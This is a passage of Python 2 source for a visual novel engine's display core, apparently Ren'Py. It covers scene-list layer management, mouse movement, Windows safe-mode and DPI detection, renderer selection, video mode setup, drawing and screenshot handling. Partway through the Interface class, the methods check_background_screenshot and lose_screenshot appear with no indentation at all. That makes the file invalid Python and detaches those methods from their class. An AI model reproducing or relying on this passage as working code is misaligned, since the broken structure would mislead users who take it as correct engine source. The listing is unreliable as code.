        rv = [ ]
        for i in self.visit():
            if i is not None:
                speech = i._tts()
                if speech.strip():
                    rv.append(speech)
        rv = ": ".join(rv)
        rv = rv.replace("::", ":")
        rv = rv.replace(": :", ":")
        alt = self.style.alt
        if alt is None:
            alt = default_alt
        if alt is not None:
            rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
        return rv
    def _tts(self):
        """Returns the self-voicing text for this displayable."""
        return self._tts_common()
    def _tts_all(self):
        """Returns the self-voicing text for this displayable and its children."""
        return self._tts_common()
class SceneListEntry(renpy.object.Object):
    """
    One entry on a scene-list layer, bundling (tag, zorder, show_time,
    animation_time, displayable, name). Iteration and indexing expose
    the first five fields as a tuple.
    """

    def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
        self.tag = tag
        self.zorder = zorder
        self.show_time = show_time
        self.animation_time = animation_time
        self.displayable = displayable
        self.name = name

    def _as_tuple(self):
        # The 5-tuple view shared by __iter__ and __getitem__.
        return (self.tag, self.zorder, self.show_time,
                self.animation_time, self.displayable)

    def __iter__(self):
        return iter(self._as_tuple())

    def __getitem__(self, index):
        return self._as_tuple()[index]

    def __repr__(self):
        return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)

    def copy(self):
        """Returns a new SceneListEntry with the same field values."""
        return SceneListEntry(self.tag, self.zorder, self.show_time,
                              self.animation_time, self.displayable,
                              self.name)

    def update_time(self, time):
        """
        Returns this entry with any unset show/animation time filled in
        with `time`; returns self unchanged when both are already set.
        """
        if (self.show_time is not None) and (self.animation_time is not None):
            return self
        rv = self.copy()
        rv.show_time = rv.show_time or time
        rv.animation_time = rv.animation_time or time
        return rv
class SceneLists(renpy.object.Object):
    """
    The per-context lists of what is shown on each layer, together with
    the at-lists and layer transforms that apply to them.
    """
    # Bumped when the pickled layout changes; see after_upgrade.
    __version__ = 7
    def after_setstate(self):
        """Ensures layers added to the config since the save exist here."""
        for i in renpy.config.layers + renpy.config.top_layers:
            if i not in self.layers:
                self.layers[i] = [ ]
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
    def after_upgrade(self, version):
        """Migrates pickled state saved under an older __version__."""
        if version < 1:
            self.at_list = { }
            self.layer_at_list = { }
            for i in renpy.config.layers + renpy.config.top_layers:
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
        if version < 3:
            self.shown_window = False
        if version < 4:
            # Old entries were plain tuples; wrap them as SceneListEntry
            # with a None name.
            for k in self.layers:
                self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
            self.additional_transient = [ ]
        if version < 5:
            self.drag_group = None
        if version < 6:
            self.shown = self.image_predict_info
        if version < 7:
            self.layer_transform = { }
    def __init__(self, oldsl, shown):
        """
        Creates new scene lists, copying layer state from `oldsl` (the
        previous SceneLists, or None) and using `shown` to track which
        images are showing.
        """
        super(SceneLists, self).__init__()
        # Has a window been shown as part of these scene lists?
        self.shown_window = False
        # A map from layer name -> list(SceneListEntry)
        self.layers = { }
        # A map from layer name -> tag -> at_list associated with that tag.
        self.at_list = { }
        # A map from layer to (show time, at_list), where the at list has
        # been applied to the layer as a whole.
        self.layer_at_list = { }
        # The current shown images,
        self.shown = shown
        # A list of (layer, tag) pairs that are considered to be
        # transient.
        self.additional_transient = [ ]
        # Either None, or a DragGroup that's used as the default for
        # drags that don't have one.
        self.drag_group = None
        # A map from layer name to the transform applied to it.
        self.layer_transform = { }
        if oldsl:
            for i in renpy.config.layers + renpy.config.top_layers:
                try:
                    self.layers[i] = oldsl.layers[i][:]
                except KeyError:
                    self.layers[i] = [ ]
                if i in oldsl.at_list:
                    self.at_list[i] = oldsl.at_list[i].copy()
                    self.layer_at_list[i] = oldsl.layer_at_list[i]
                else:
                    self.at_list[i] = { }
                    self.layer_at_list[i] = (None, [ ])
            for i in renpy.config.overlay_layers:
                self.clear(i)
            self.replace_transient(prefix=None)
            self.focused = None
            self.drag_group = oldsl.drag_group
            self.layer_transform.update(oldsl.layer_transform)
        else:
            for i in renpy.config.layers + renpy.config.top_layers:
                self.layers[i] = [ ]
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
            self.music = None
            self.focused = None
    def replace_transient(self, prefix="hide"):
        """
        Clears the transient layers and removes the additional-transient
        (layer, tag) pairs; `prefix` selects the hide event used.
        """
        for i in renpy.config.transient_layers:
            self.clear(i, True)
        for layer, tag in self.additional_transient:
            self.remove(layer, tag, prefix=prefix)
        self.additional_transient = [ ]
    def transient_is_empty(self):
        """Returns true if every transient layer is empty."""
        for i in renpy.config.transient_layers:
            if self.layers[i]:
                return False
        return True
    def transform_state(self, old_thing, new_thing, execution=False):
        """
        Copies transform state from `old_thing` to `new_thing`, wrapping
        the latter in a Transform when needed. With `execution` set, the
        execution state is copied as well. Returns the (possibly
        wrapped) new thing.
        """
        if old_thing is None:
            return new_thing
        if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
            return new_thing
        if renpy.config.take_state_from_target:
            old_transform = old_thing._target()
        else:
            old_transform = old_thing
        if not isinstance(old_transform, renpy.display.motion.Transform):
            return new_thing
        if renpy.config.take_state_from_target:
            new_transform = new_thing._target()
        else:
            new_transform = new_thing
        if not isinstance(new_transform, renpy.display.motion.Transform):
            new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
        new_transform.take_state(old_transform)
        if execution:
            new_transform.take_execution_state(old_transform)
        return new_thing
    def find_index(self, layer, tag, zorder, behind):
        """
        Finds where an entry tagged `tag` should be added on `layer`.
        Returns (add_index, remove_index, zorder): the insertion index,
        the index of an existing entry with the same tag (or None), and
        the resolved zorder.
        """
        add_index = None
        remove_index = None
        for i, sle in enumerate(self.layers[layer]):
            if remove_index is None:
                if (sle.tag and sle.tag == tag) or sle.displayable == tag:
                    remove_index = i
                    if zorder is None:
                        zorder = sle.zorder
        if zorder is None:
            zorder = renpy.config.tag_zorder.get(tag, 0)
        for i, sle in enumerate(self.layers[layer]):
            if add_index is None:
                if sle.zorder == zorder:
                    if sle.tag and (sle.tag == tag or sle.tag in behind):
                        add_index = i
                elif sle.zorder > zorder:
                    add_index = i
        if add_index is None:
            add_index = len(self.layers[layer])
        return add_index, remove_index, zorder
    def add(self,
            layer,
            thing,
            key=None,
            zorder=0,
            behind=[ ],
            at_list=[ ],
            name=None,
            atl=None,
            default_transform=None,
            transient=False,
            keep_st=False):
        """
        Adds displayable `thing` to `layer` under tag `key`, replacing
        any existing entry with the same tag and carrying transform
        state over to the replacement. `atl` wraps the displayable in an
        ATLTransform; `keep_st` preserves the old show time.
        """
        if not isinstance(thing, Displayable):
            raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
        if layer not in self.layers:
            raise Exception("Trying to add something to non-existent layer '%s'." % layer)
        if key:
            self.remove_hide_replaced(layer, key)
            self.at_list[layer][key] = at_list
        if key and name:
            self.shown.predict_show(layer, name)
        if transient:
            self.additional_transient.append((layer, key))
        l = self.layers[layer]
        if atl:
            thing = renpy.display.motion.ATLTransform(atl, child=thing)
        add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
        at = None
        st = None
        if remove_index is not None:
            sle = l[remove_index]
            old = sle.displayable
            at = sle.animation_time
            if keep_st:
                st = sle.show_time
            if (not atl and
                    not at_list and
                    renpy.config.keep_running_transform and
                    isinstance(old, renpy.display.motion.Transform)):
                # Keep the running transform, just swapping its child.
                thing = sle.displayable._change_transform_child(thing)
            else:
                thing = self.transform_state(l[remove_index].displayable, thing)
            thing.set_transform_event("replace")
            thing._show()
        else:
            if not isinstance(thing, renpy.display.motion.Transform):
                thing = self.transform_state(default_transform, thing)
            thing.set_transform_event("show")
            thing._show()
        sle = SceneListEntry(key, zorder, st, at, thing, name)
        l.insert(add_index, sle)
        if remove_index is not None:
            if add_index <= remove_index:
                remove_index += 1
            self.hide_or_replace(layer, remove_index, "replaced")
    def hide_or_replace(self, layer, index, prefix):
        """
        Hides (or replaces) the entry at `index` on `layer`. If the
        displayable's _hide returns a replacement, it is kept on the
        layer tagged "prefix$tag"; otherwise the entry is removed.
        """
        if index is None:
            return
        l = self.layers[layer]
        oldsle = l[index]
        now = get_time()
        st = oldsle.show_time or now
        at = oldsle.animation_time or now
        if renpy.config.fast_unhandled_event:
            if not oldsle.displayable._handles_event(prefix):
                prefix = None
        if (prefix is not None) and oldsle.tag:
            d = oldsle.displayable._hide(now - st, now - at, prefix)
            # _hide can mutate the layers, so we need to recompute
            # index.
            index = l.index(oldsle)
            if d is not None:
                sle = SceneListEntry(
                    prefix + "$" + oldsle.tag,
                    oldsle.zorder,
                    st,
                    at,
                    d,
                    None)
                l[index] = sle
                return
        l.pop(index)
    def get_all_displayables(self):
        """Returns every displayable on every layer, as a flat list."""
        rv = [ ]
        for l in self.layers.itervalues():
            for sle in l:
                rv.append(sle.displayable)
        return rv
    def remove_above(self, layer, thing):
        """
        Hides everything on `layer` above `thing` (a tag or
        displayable), skipping entries already in a hide/replace state.
        """
        for i in reversed(xrange(len(self.layers[layer]))):
            sle = self.layers[layer][i]
            if thing:
                if sle.tag == thing or sle.displayable == thing:
                    break
            if sle.tag and "$" in sle.tag:
                continue
            self.hide_or_replace(layer, i, "hide")
    def remove(self, layer, thing, prefix="hide"):
        """
        Removes `thing` (a tag or displayable) from `layer`, updating
        prediction info and the layer's at-list.
        """
        if layer not in self.layers:
            raise Exception("Trying to remove something from non-existent layer '%s'." % layer)
        _add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])
        if remove_index is not None:
            tag = self.layers[layer][remove_index].tag
            if tag:
                self.shown.predict_hide(layer, (tag,))
                self.at_list[layer].pop(tag, None)
            self.hide_or_replace(layer, remove_index, prefix)
    def clear(self, layer, hide=False):
        """
        Empties `layer`. With `hide` set, each entry goes through
        hide_or_replace instead of being dropped outright.
        """
        if layer not in self.layers:
            return
        if not hide:
            self.layers[layer] = [ ]
        else:
            # Have to iterate in reverse order, since otherwise
            # the indexes might change.
            for i in reversed(xrange(len(self.layers[layer]))):
                self.hide_or_replace(layer, i, hide)
        self.at_list[layer].clear()
        self.shown.predict_scene(layer)
        self.layer_at_list[layer] = (None, [ ])
    def set_layer_at_list(self, layer, at_list, reset=True):
        """Sets the at-list applied to `layer` as a whole."""
        self.layer_at_list[layer] = (None, list(at_list))
        if reset:
            self.layer_transform[layer] = None
    def set_times(self, time):
        """Fills unset show/animation times on all layers with `time`."""
        for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
            self.layer_at_list[l] = (t or time, list)
        for l, ll in self.layers.iteritems():
            self.layers[l] = [ i.update_time(time) for i in ll ]
    def showing(self, layer, name):
        """Returns true if the image `name` is showing on `layer`."""
        return self.shown.showing(layer, name)
    def get_showing_tags(self, layer):
        """Returns the set of tags showing on `layer` (per self.shown)."""
        return self.shown.get_showing_tags(layer)
    def get_sorted_tags(self, layer):
        """
        Returns the tags on `layer` in display order, skipping untagged
        entries and hide/replace placeholders (tags containing "$").
        """
        rv = [ ]
        for sle in self.layers[layer]:
            if not sle.tag:
                continue
            if "$" in sle.tag:
                continue
            rv.append(sle.tag)
        return rv
    def make_layer(self, layer, properties):
        """
        Builds the displayable representing `layer`: a fixed MultiBox of
        the layer's entries, with the layer-wide at-list and transform
        state applied on top.
        """
        rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
        rv.append_scene_list(self.layers[layer])
        rv.layer_name = layer
        rv._duplicatable = False
        time, at_list = self.layer_at_list[layer]
        old_transform = self.layer_transform.get(layer, None)
        new_transform = None
        if at_list:
            for a in at_list:
                if isinstance(a, renpy.display.motion.Transform):
                    rv = a(child=rv)
                    new_transform = rv
                else:
                    rv = a(rv)
            if (new_transform is not None) and (renpy.config.keep_show_layer_state):
                self.transform_state(old_transform, new_transform, execution=True)
            f = renpy.display.layout.MultiBox(layout='fixed')
            f.add(rv, time, time)
            f.layer_name = layer
            rv = f
        self.layer_transform[layer] = new_transform
        return rv
    def remove_hide_replaced(self, layer, tag):
        """Drops any hide$/replaced$ placeholders for `tag` on `layer`."""
        hide_tag = "hide$" + tag
        replaced_tag = "replaced$" + tag
        l = self.layers[layer]
        self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]
    def remove_hidden(self):
        """
        Re-runs _hide on hide$/replaced$ placeholders, dropping those
        whose hide animation has finished.
        """
        now = get_time()
        for l in self.layers:
            newl = [ ]
            for sle in self.layers[l]:
                if sle.tag:
                    if sle.tag.startswith("hide$"):
                        d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
                        if not d:
                            continue
                    elif sle.tag.startswith("replaced$"):
                        d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
                        if not d:
                            continue
                newl.append(sle)
            self.layers[l] = newl
    def remove_all_hidden(self):
        """Drops every hide$/replaced$ placeholder from every layer."""
        for l in self.layers:
            newl = [ ]
            for sle in self.layers[l]:
                if sle.tag:
                    if "$" in sle.tag:
                        continue
                newl.append(sle)
            self.layers[l] = newl
    def get_displayable_by_tag(self, layer, tag):
        """Returns the displayable shown under `tag` on `layer`, or None."""
        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)
        for sle in self.layers[layer]:
            if sle.tag == tag:
                return sle.displayable
        return None
    def get_displayable_by_name(self, layer, name):
        """Returns the displayable shown under image `name` on `layer`, or None."""
        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)
        for sle in self.layers[layer]:
            if sle.name == name:
                return sle.displayable
        return None
    def get_image_bounds(self, layer, tag, width, height):
        """
        Returns the (x, y, w, h) rectangle the image tagged `tag` would
        occupy when rendered into width x height, or None if the tag is
        not on `layer`.
        """
        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)
        for sle in self.layers[layer]:
            if sle.tag == tag:
                break
        else:
            return None
        now = get_time()
        if sle.show_time is not None:
            st = now - sle.show_time
        else:
            st = 0
        if sle.animation_time is not None:
            at = now - sle.animation_time
        else:
            at = 0
        surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)
        sw = surf.width
        sh = surf.height
        x, y = place(width, height, sw, sh, sle.displayable.get_placement())
        return (x, y, sw, sh)
def scene_lists(index=-1):
    """Returns the SceneLists of the context at `index` (default: current)."""
    return renpy.game.context(index).scene_lists
class MouseMove(object):
    """
    Linearly moves the mouse pointer from its current position to
    (x, y) over `duration` seconds (None is treated as 0, i.e. an
    immediate warp).
    """

    def __init__(self, x, y, duration):
        self.start = get_time()
        self.duration = duration if duration is not None else 0
        self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()
        self.end_x = x
        self.end_y = y

    def perform(self):
        """
        Advances the move one step. Returns True while the move is
        still in progress, False once the pointer has reached the end.
        """
        elapsed = get_time() - self.start
        if elapsed >= self.duration:
            # Done (or duration 0): snap to the final position.
            renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
            return False
        frac = 1.0 * elapsed / self.duration
        cur_x = int(self.start_x + frac * (self.end_x - self.start_x))
        cur_y = int(self.start_y + frac * (self.end_y - self.start_y))
        renpy.display.draw.set_mouse_pos(cur_x, cur_y)
        return True
def get_safe_mode():
    """
    Returns True when safe mode should be enabled: the shift key is
    held down at startup on Windows. Returns False once the check has
    already been performed, on other platforms, or on any error.
    """
    if renpy.safe_mode_checked:
        return False
    try:
        if not renpy.windows:
            # Safe mode doesn't work on other platforms.
            return False
        import ctypes
        VK_SHIFT = 0x10
        ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
        # High bit set means the key is currently down.
        return bool(ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000)
    except:
        return False
# Seconds of maximum framerate requested when the Interface starts
# (passed to Interface.maximum_framerate in __init__).
initial_maximum_framerate = 0.0
class Interface(object):
    def __init__(self):
        """
        Initializes the display interface: screenshot state, transition
        bookkeeping, event/timer state, layer clipping properties, the
        audio system, and pygame's display module.
        """
        # Screenshot state.
        self.screenshot = None
        self.screenshot_surface = None
        # Per-layer transition bookkeeping.
        self.old_scene = { }
        self.transition = { }
        self.ongoing_transition = { }
        self.transition_time = { }
        self.transition_from = { }
        self.suppress_transition = False
        self.quick_quit = False
        self.force_redraw = False
        self.restart_interaction = False
        # A single event can be pushed back for event_peek/event_poll.
        self.pushed_event = None
        self.ticks = 0
        self.mouse = 'default'
        self.timeout_time = None
        self.last_event = None
        self.current_context = None
        self.roll_forward = None
        self.preloads = [ ]
        self.frame_time = 0
        self.interact_time = None
        self.quit_time = 0
        self.in_quit_event = False
        # Reusable event objects posted by timers.
        self.time_event = pygame.event.Event(TIMEEVENT)
        self.redraw_event = pygame.event.Event(REDRAW)
        # Assume focus until told otherwise.
        self.mouse_focused = True
        self.keyboard_focused = True
        self.layer_properties = { }
        self.shown_window = False
        self.fullscreen = False
        self.ignore_touch = False
        self.clear_screenshot = False
        # Build per-layer properties, applying configured clipping.
        for layer in renpy.config.layers + renpy.config.top_layers:
            if layer in renpy.config.layer_clipping:
                x, y, w, h = renpy.config.layer_clipping[layer]
                self.layer_properties[layer] = dict(
                    xpos=x,
                    xanchor=0,
                    ypos=y,
                    yanchor=0,
                    xmaximum=w,
                    ymaximum=h,
                    xminimum=w,
                    yminimum=h,
                    clipping=True,
                    )
            else:
                self.layer_properties[layer] = dict()
        self.transition_info_stack = [ ]
        self.event_time = 0
        self.mouse_event_time = None
        self.show_mouse = True
        self.display_reset = False
        self.last_resize = None
        # The thread the interface runs on, used to detect cross-thread
        # screenshot requests.
        self.thread = threading.current_thread()
        renpy.audio.audio.init()
        try:
            pygame.display.init()
        except:
            pass
        init_time()
        self.mouse_event_time = get_time()
        self.window_caption = None
        renpy.game.interface = self
        renpy.display.interface = self
        self.safe_mode = False
        # Background-thread screenshot handshake state.
        self.bgscreenshot_needed = False
        self.bgscreenshot_event = threading.Event()
        self.bgscreenshot_surface = None
        self.mouse_move = None
        # On-screen text input state.
        self.text_editing = None
        self.text_rect = None
        self.old_text_rect = None
        self.touch = renpy.exports.variant("touch")
        self.restart_interaction = True
        if renpy.config.periodic_callback:
            renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)
        renpy.display.emulator.init_emulator()
        self.started = False
        self.fullscreen_video = False
        self.safe_mode = get_safe_mode()
        renpy.safe_mode_checked = True
        self.dpi_scale = self.setup_dpi_scaling()
        renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)
        self.maximum_framerate_time = 0.0
        self.maximum_framerate(initial_maximum_framerate)
        self.start_interact = True
        # Recent frame timestamps, used for performance tracking.
        self.frame_times = [ ]
        self.frame_duration = 1.0 / 60.0
    def setup_dpi_scaling(self):
        """
        Returns the DPI scale factor: the RENPY_HIGHDPI override when
        set, the Windows logical-DPI / 96 ratio, or 1.0 on other
        platforms or on error.
        """
        if "RENPY_HIGHDPI" in os.environ:
            return float(os.environ["RENPY_HIGHDPI"])
        if not renpy.windows:
            return 1.0
        try:
            import ctypes
            from ctypes import c_void_p, c_int
            ctypes.windll.user32.SetProcessDPIAware()
            GetDC = ctypes.windll.user32.GetDC
            GetDC.restype = c_void_p
            GetDC.argtypes = [ c_void_p ]
            ReleaseDC = ctypes.windll.user32.ReleaseDC
            ReleaseDC.argtypes = [ c_void_p, c_void_p ]
            GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
            GetDeviceCaps.restype = c_int
            GetDeviceCaps.argtypes = [ c_void_p, c_int ]
            LOGPIXELSX = 88
            dc = GetDC(None)
            # 96 DPI is the Windows baseline (scale 1.0).
            rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
            ReleaseDC(None, dc)
            if rv < renpy.config.de_minimus_dpi_scale:
                renpy.display.log.write("De minimus DPI scale, was %r", rv)
                rv = 1.0
            return rv
        except:
            renpy.display.log.write("Could not determine DPI scale factor:")
            renpy.display.log.exception()
            return 1.0
    def start(self):
        """
        Starts the interface on first use: sets the video mode, loads
        fonts, starts the periodic timer, and initializes controllers
        (unless safe mode is on). Idempotent.
        """
        if self.started:
            return
        # Get garbage collection out of the way before the first frame.
        gc.collect()
        if gc.garbage:
            gc.garbage[:] = [ ]
        renpy.display.render.render_ready()
        # Kill the presplash screen.
        renpy.display.presplash.end()
        renpy.main.log_clock("Interface start")
        self.started = True
        self.set_mode()
        renpy.text.font.load_fonts()
        pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
        pygame.event.set_grab(False)
        if not self.safe_mode:
            renpy.display.controller.init()
        s = "Total time until interface ready: {}s".format(time.time() - import_time)
        renpy.display.log.write(s)
        if renpy.android and not renpy.config.log_to_stdout:
            print(s)
    def post_init(self):
        """
        Display setup done after pygame.display is initialized: window
        caption and icon, key repeat, Android wakelock, and blocking of
        unused pygame event types.
        """
        pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")
        # Needed for Unity.
        wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
        os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")
        self.set_window_caption(force=True)
        self.set_icon()
        if renpy.config.key_repeat is not None:
            delay, repeat_delay = renpy.config.key_repeat
            pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))
        if android:
            android.wakelock(True)
        # Block events we don't use.
        for i in pygame.event.get_standard_events():
            if i in enabled_events:
                continue
            if i in renpy.config.pygame_events:
                continue
            pygame.event.set_blocked(i)
    def set_icon(self):
        """
        Sets the window icon from config.window_icon, padding the image
        onto a square surface first.
        """
        icon = renpy.config.window_icon
        if icon:
            im = renpy.display.scale.image_load_unscaled(
                renpy.loader.load(icon),
                icon,
                )
            # Center the image on a square surface sized to its larger
            # dimension.
            iw, ih = im.get_size()
            imax = max(iw, ih)
            square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
            square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
            im = square_im
            pygame.display.set_icon(im)
    def set_window_caption(self, force=False):
        """
        Sets the window caption from config.window_title plus the
        _window_subtitle, skipping the call when unchanged unless
        `force` is set.
        """
        window_title = renpy.config.window_title
        if window_title is None:
            window_title = "A Ren'Py Game"
        caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
        if renpy.exports.get_autoreload():
            caption += " - autoreload"
        if not force and caption == self.window_caption:
            return
        self.window_caption = caption
        pygame.display.set_caption(caption.encode("utf-8"))
    def iconify(self):
        """Minimizes (iconifies) the game window."""
        pygame.display.iconify()
    def get_draw_constructors(self):
        """
        Returns the list of candidate draw (renderer) objects to try, in
        preference order, based on the preference/environment renderer
        choice, the platform, and safe mode (which forces "sw").
        """
        renderer = renpy.game.preferences.renderer
        renderer = os.environ.get("RENPY_RENDERER", renderer)
        if self.safe_mode:
            renderer = "sw"
        # ANGLE only exists on Windows.
        if (renderer == "angle") and (not renpy.windows):
            renderer = "auto"
        renpy.config.renderer = renderer
        if renderer == "auto":
            if renpy.windows:
                renderers = [ "gl", "angle", "sw" ]
            else:
                renderers = [ "gl", "sw" ]
            if renpy.config.gl2:
                renderers = [ "gl2", "egl2" ] + renderers
        else:
            # Always fall back to the software renderer.
            renderers = [ renderer, "sw" ]
        draw_objects = { }
        def make_draw(name, mod, cls, *args):
            # Instantiates renderer `name` from module `mod` if it is a
            # candidate; returns True on success.
            if name not in renderers:
                return False
            try:
                __import__(mod)
                module = sys.modules[mod]
                draw_class = getattr(module, cls)
                draw_objects[name] = draw_class(*args)
                return True
            except:
                renpy.display.log.write("Couldn't import {0} renderer:".format(name))
                renpy.display.log.exception()
                return False
        if renpy.windows:
            has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
        else:
            has_angle = False
        make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
        make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
        make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
        make_draw("sw", "renpy.display.swdraw", "SWDraw")
        rv = [ ]
        def append_draw(name):
            # Appends the constructed renderer, logging unknown names.
            if name in draw_objects:
                rv.append(draw_objects[name])
            else:
                renpy.display.log.write("Unknown renderer: {0}".format(name))
        for i in renderers:
            append_draw(i)
        return rv
    def kill_textures(self):
        """Frees GPU textures, the render tree, and the text layout cache."""
        if renpy.display.draw is not None:
            renpy.display.draw.kill_textures()
        renpy.display.render.free_memory()
        renpy.text.text.layout_cache_clear()
    def kill_textures_and_surfaces(self):
        """Frees textures plus the image cache and bo_cache surfaces."""
        self.kill_textures()
        renpy.display.im.cache.clear()
        renpy.display.module.bo_cache = None
    def set_mode(self, physical_size=None):
        """
        (Re)initializes the video mode, selecting and initializing a
        renderer. Handles display resets (e.g. after suspend), persists
        the physical window size, and resets per-interaction state.
        Raises if no renderer can set a mode.
        """
        # The software renderer cannot keep movies running across a
        # mode change.
        if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
            renpy.display.video.movie_stop(clear=False)
        renpy.display.render.free_memory()
        renpy.text.text.layout_cache_clear()
        renpy.display.module.bo_cache = None
        if self.display_reset:
            pygame.key.stop_text_input()
            pygame.key.set_text_input_rect(None)
            self.text_rect = None
            # ANGLE needs a full quit/reinit to recover its context.
            if renpy.display.draw.info["renderer"] == "angle":
                renpy.display.draw.quit()
                pygame.display.quit()
            self.kill_textures_and_surfaces()
        self.old_text_rect = None
        self.display_reset = False
        virtual_size = (renpy.config.screen_width, renpy.config.screen_height)
        if physical_size is None:
            if renpy.mobile or renpy.game.preferences.physical_size is None:
                physical_size = (None, None)
            else:
                physical_size = renpy.game.preferences.physical_size
        fullscreen = renpy.game.preferences.fullscreen
        old_fullscreen = self.fullscreen
        self.fullscreen = fullscreen
        if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
            fullscreen = False
            self.fullscreen = renpy.game.preferences.fullscreen
        if renpy.display.draw:
            # Reuse the active renderer on subsequent calls.
            draws = [ renpy.display.draw ]
        else:
            draws = self.get_draw_constructors()
        for draw in draws:
            if draw.set_mode(virtual_size, physical_size, fullscreen):
                renpy.display.draw = draw
                renpy.display.render.models = draw.info.get("models", False)
                break
            else:
                pass
        else:
            # Every candidate renderer failed.
            renpy.game.preferences.fullscreen = False
            raise Exception("Could not set video mode.")
        # Save the video size.
        if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
            renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()
        if android:
            android.init()
        # We need to redraw the (now blank) screen.
        self.force_redraw = True
        # Assume we have focus until told otherwise.
        self.mouse_focused = True
        self.keyboard_focused = True
        # Assume we're not minimized.
        self.minimized = False
        self.restart_interaction = True
        self.profile_once = False
        # Clear the frame times.
        self.frame_times = [ ]
    def draw_screen(self, root_widget, fullscreen_video, draw):
        """
        Renders `root_widget` into a surface tree and, when `draw` is
        true, draws it to the window, recording the frame time for
        performance tracking.
        """
        try:
            renpy.display.render.per_frame = True
            renpy.display.screen.per_frame()
        finally:
            renpy.display.render.per_frame = False
        surftree = renpy.display.render.render_screen(
            root_widget,
            renpy.config.screen_width,
            renpy.config.screen_height,
            )
        if draw:
            renpy.display.draw.draw_screen(surftree, fullscreen_video)
            # Keep only frame times inside the performance window.
            now = time.time()
            self.frame_times.append(now)
            while (now - self.frame_times[0]) > renpy.config.performance_window:
                self.frame_times.pop(0)
        renpy.display.render.mark_sweep()
        renpy.display.focus.take_focuses()
        self.surftree = surftree
        self.fullscreen_video = fullscreen_video
    def take_screenshot(self, scale, background=False):
        """
        Takes a screenshot scaled to `scale` (a (w, h) tuple), storing
        the surface and its PNG bytes on self. With `background`, the
        capture is delegated to the interface thread and awaited.
        """
        self.clear_screenshot = False
        # Do nothing before the first interaction.
        if not self.started:
            return
        if background and not renpy.emscripten:
            # Ask the interface thread (via check_background_screenshot)
            # to perform the capture.
            self.bgscreenshot_event.clear()
            self.bgscreenshot_needed = True
            if not self.bgscreenshot_event.wait(1.0):
                raise Exception("Screenshot timed out.")
            surf = self.bgscreenshot_surface
            self.bgscreenshot_surface = None
        else:
            surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
        surf = renpy.display.scale.smoothscale(surf, scale)
        renpy.display.render.mutated_surface(surf)
        self.screenshot_surface = surf
        # Also keep the PNG-encoded bytes for saving.
        sio = cStringIO.StringIO()
        renpy.display.module.save_png(surf, sio, 0)
        self.screenshot = sio.getvalue()
        sio.close()
def check_background_screenshot(self):
if self.bgscreenshot_needed:
self.bgscreenshot_needed = False
self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
self.bgscreenshot_event.set()
    def get_screenshot(self):
        """
        Returns the PNG bytes of the current screenshot, taking a
        thumbnail-sized one (possibly from a background thread) when
        none is cached, and then discarding the cache.
        """
        if not self.started:
            self.start()
        rv = self.screenshot
        if not rv:
            self.take_screenshot(
                (renpy.config.thumbnail_width, renpy.config.thumbnail_height),
                background=(threading.current_thread() is not self.thread),
                )
            rv = self.screenshot
            self.lose_screenshot()
        return rv
def lose_screenshot(self):
self.screenshot = None
self.screenshot_surface = None
    def save_screenshot(self, filename):
        """
        Saves a full-window screenshot (cropped per
        config.screenshot_crop) to `filename`. Returns True on success,
        False on failure (re-raising under config.debug).
        """
        window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
        if renpy.config.screenshot_crop:
            window = window.subsurface(renpy.config.screenshot_crop)
        try:
            renpy.display.scale.image_save_unscaled(window, filename)
            if renpy.emscripten:
                # In the browser, trigger a download of the saved file.
                import emscripten
                emscripten.run_script(r'''FSDownload('%s')''' % filename)
            return True
        except:
            if renpy.config.debug:
                raise
            return False
    def show_window(self):
        """
        Shows the empty dialogue window via config.empty_window, when
        _window is enabled, the preference allows it, and no window has
        been shown this interaction. History is suppressed while doing
        so.
        """
        if not renpy.store._window:
            return
        if not renpy.game.preferences.show_empty_window:
            return
        if renpy.game.context().scene_lists.shown_window:
            return
        if renpy.config.empty_window:
